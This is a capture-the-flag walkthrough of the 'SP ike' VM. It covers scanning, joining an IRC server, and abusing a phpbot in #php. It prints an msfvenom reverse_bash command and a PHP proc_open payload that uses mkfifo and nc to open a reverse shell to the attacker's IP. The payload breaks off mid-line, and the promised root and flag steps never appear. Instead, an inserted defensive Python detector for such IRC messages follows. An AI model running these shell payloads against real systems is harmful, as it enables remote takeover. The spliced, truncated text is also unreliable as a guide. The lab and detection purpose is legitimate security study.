Hello friends! Today we are going to take another CTF challenge known as “SP ike”. The credit for making this VM machine goes to “Daniel Solstad”. Our goal is to get flags to complete the challenge.
Security Level: Intermediate
Penetrating Methodology:
- Discovering Targets IP
- Network scanning (Nmap)
- Surfing HTTP service port
- Configuring HEXCHAT IRC Client
- Connecting to IRC Server
- Creating PHP Malicious Script using MSFvenom
- Using Netcat Listener
- Spawning TTY Shell
- Getting Root Access
- Reading Final Flag
Let’s start off with scanning the network to find our target.
netdiscover
We found our target –> 192.168.1.21
Time to scan the Target’s IP with nmap. Nmap scan result shows FOUR open ports, 80(http), 139(netbios-ssn), 445(netbios-ssn), 6667(irc).
nmap -sV -T4 192.168.1.21
Since port 80 is running HTTP, we thought of browsing the Target’s IP in our browser. But it was not of much help. Moving on.
Even directory scanning with the dirb tool was not very useful. That left us with the IRC chat server on port 6667, so we used the IRC client Hexchat to connect to it. First we need to configure Hexchat by adding a new profile and editing the connection details.
Now edit the network ike which we have added and give it the Target’s IP, as you can see in the image.
We have successfully connected to the IRC server, and we found something interesting: the server has a channel #php which has a phpbot. I guess it wouldn’t be a problem for the phpbot to execute a PHP script.
We created a msfvenom script to exploit the target machine. We used the reverse_netcat payload to create this script.
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.34 lport=1234 R
After making a few tries, we were finally able to execute our PHP script successfully. To get a reverse shell, execute the script given below.
!php
$s=array(); $p=array(); proc_open("mkfifo /tmp/tsglu; nc 192.168.1.34 1234
0
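Seen from the defender's side, a message like the one above stands out in IRC traffic. The following is an added example, not part of the original walkthrough: it parses raw IRC PRIVMSG lines and flags messages sent to the bot trigger that call PHP process-execution functions or carry reverse-shell markers. The sample lines, nicknames, hosts and the function name `scan` are constructed for illustration.

```python
import re

# Raw IRC line: ":nick!user@host PRIVMSG <target> :<text>"
PRIVMSG = re.compile(
    r"^:(?P<nick>[^!\s]+)!(?P<user>[^@\s]+)@(?P<host>\S+) "
    r"PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
# PHP calls that start an OS process, plus backtick execution.
PHP_EXEC = re.compile(
    r"\b(proc_open|popen|shell_exec|pcntl_exec|exec|system|passthru)\s*\("
    r"|`[^`]+`", re.I)
# Shell fragments typical of a reverse shell.
SHELL_MARKERS = re.compile(
    r"\bmkfifo\b|/dev/tcp/|\b(?:nc|ncat|netcat)\s+\S+\s+\d{1,5}\b", re.I)

# Constructed sample traffic (nicknames and hosts are made up).
SAMPLE = [
    ':alice!a@10.0.0.5 PRIVMSG #php :!php echo strlen("hello");',
    ':guest!g@192.168.1.34 PRIVMSG #php :!php $s=array(); $p=array(); '
    'proc_open("mkfifo /tmp/tsglu; nc 192.168.1.34 1234 ...',
    ':bob!b@10.0.0.7 PRIVMSG #general :proc_open is disabled on my host',
    ':carol!c@10.0.0.9 PRIVMSG #php :!php echo shell_exec("id");',
    'PING :irc.example',
]

def scan(lines, trigger="!php"):
    """Return one finding per bot-trigger message that looks like command execution."""
    findings = []
    for number, raw in enumerate(lines, 1):
        m = PRIVMSG.match(raw.rstrip("\r\n"))
        words = m["text"].split(None, 1) if m else []
        if not words or words[0].lower() != trigger:
            continue  # not a PRIVMSG, or not addressed to the bot trigger
        code = words[1] if len(words) > 1 else ""
        reasons = []
        hit = PHP_EXEC.search(code)
        if hit:
            reasons.append("php-exec:" + (hit.group(1) or "backtick").lower())
        if SHELL_MARKERS.search(code):
            reasons.append("shell-marker")
        if reasons:
            findings.append({"line": number, "nick": m["nick"],
                             "host": m["host"], "target": m["target"],
                             "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f)
```

On the server side, PHP's `disable_functions` directive in php.ini can take these process-execution functions away from a bot that has to evaluate user-supplied code.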
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst.